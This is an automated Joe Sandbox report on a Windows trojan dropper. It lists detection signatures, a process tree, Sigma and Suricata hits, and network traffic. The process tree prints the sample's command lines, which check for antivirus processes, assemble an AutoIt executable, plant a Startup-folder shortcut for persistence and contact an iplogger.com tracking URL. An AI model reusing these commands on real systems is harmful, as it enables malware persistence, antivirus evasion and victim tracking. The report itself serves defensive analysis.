Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cW5i0RdQ4L.exe

Overview

General Information

Sample name:cW5i0RdQ4L.exe
renamed because original name is a hash value
Original sample name:c065ba22909fc8dbded4ea0eebb24ad5.exe
Analysis ID:1532361
MD5:c065ba22909fc8dbded4ea0eebb24ad5
SHA1:b3d61dd7519be3d2909be9ce2d28f65ec7f9965d
SHA256:9817f4d8bc1374f102196cfcb8a351abdc0563dea60f6084a7525e5ee5409b6d
Tags:32exetrojan
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cW5i0RdQ4L.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\cW5i0RdQ4L.exe" MD5: C065BA22909FC8DBDED4EA0EEBB24AD5)
    • cmd.exe (PID: 6888 cmdline: "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7144 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7132 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2056 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3608 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1908 cmdline: cmd /c md 103495 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 2916 cmdline: findstr /V "aroundaccommodategroupseverything" Fine MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3592 cmdline: cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Powder.pif (PID: 180 cmdline: Powder.pif n MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 1740 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2568 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7132 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • GuardianCryptoElite.scr (PID: 1908 cmdline: "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Threat createdAuthor: @SBousseaden (detection), Thomas Patzke (rule): Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 7132, StartAddress: 40F8BCC0, TargetImage: C:\Windows\SysWOW64\findstr.exe, TargetProcessId: 7132
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 7132, StartAddress: 40F8BCC0, TargetImage: C:\Windows\SysWOW64\findstr.exe, TargetProcessId: 7132
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" , CommandLine|base64offset|contains: K+-zk, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" , ProcessId: 7132, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Powder.pif n, CommandLine: Powder.pif n, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\103495\Powder.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\103495\Powder.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\103495\Powder.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6888, ParentProcessName: cmd.exe, ProcessCommandLine: Powder.pif n, ProcessId: 180, ProcessName: Powder.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\103495\Powder.pif, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\103495\Powder.pif, ProcessId: 180, TargetFilename: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" , CommandLine|base64offset|contains: K+-zk, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" , ProcessId: 7132, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1740, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6888, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 3608, ProcessName: findstr.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-13T02:07:30.303666+020028032742Potentially Bad Traffic192.168.2.449731104.21.76.57443TCP
2024-10-13T02:07:46.381126+020028032742Potentially Bad Traffic192.168.2.449737104.21.76.57443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrVirustotal: Detection: 9%Perma Link
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifVirustotal: Detection: 9%Perma Link
Source: cW5i0RdQ4L.exeVirustotal: Detection: 13%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
Source: cW5i0RdQ4L.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: cW5i0RdQ4L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6CD14 FindFirstFileW,FindClose,10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094CD14 FindFirstFileW,FindClose,16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00943CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\103495\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\103495Jump to behavior
Source: Joe Sandbox ViewIP Address: 104.21.76.57 104.21.76.57
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: iplogger.com
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 104.21.76.57:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 104.21.76.57:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_00E729BA
Source: global trafficHTTP traffic detected: GET /15RZZ4 HTTP/1.1User-Agent: CuttingHost: iplogger.com
Source: global trafficHTTP traffic detected: GET /15RZZ4 HTTP/1.1User-Agent: CuttingHost: iplogger.com
Source: global trafficDNS traffic detected: DNS query: iplogger.com
Source: global trafficDNS traffic detected: DNS query: SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 13 Oct 2024 00:07:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 13 Oct 2024 00:07:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBJvXw6fUbGRbS6RhK%2BGglPGzigQ8JyjV5ntZrCNYPilv4t%2Bg9XoXSqGoRUPjt%2FvFa12kdE6KCZ2qc23Cv6fj1N6EHxcxAdUxPNTrxcgctB2VZpV9yNWlFJp8g7wo2s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d1b16fe1a345e6e-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 13 Oct 2024 00:07:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 13 Oct 2024 00:08:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKUrKGuZsfbYGpfMv7w87P%2FU%2FWzTCe9VK5vZUxav4Fq8km2kSEIxcqEg6xpwukUByhH2upXUjS3mSd6vZP%2F3TdcVGBnYw0NEY9Hv2CUhgQDSfhXPCwQ39bhwGAJEb5I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d1b176299e4c323-EWR
Source: cW5i0RdQ4L.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cW5i0RdQ4L.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: cW5i0RdQ4L.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cW5i0RdQ4L.exeString found in binary or memory: http://ocsp.digicert.com0
Source: cW5i0RdQ4L.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: cW5i0RdQ4L.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: cW5i0RdQ4L.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmp, cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3570670968.00000000009A9000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cW5i0RdQ4L.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: Powder.pif, 0000000A.00000002.3571443767.00000000019C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/
Source: Powder.pif, 0000000A.00000002.3571321856.0000000001959000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3571781276.000000000171A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/15RZZ4
Source: Powder.pif, 0000000A.00000002.3571443767.0000000001B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/15RZZ40
Source: Powder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/15RZZ4O
Source: GuardianCryptoElite.scr, 00000010.00000002.3571413798.000000000153A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/15RZZ4eListcessId;
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/R
Source: GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/m
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Serious.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.4:49737 version: TLS 1.2
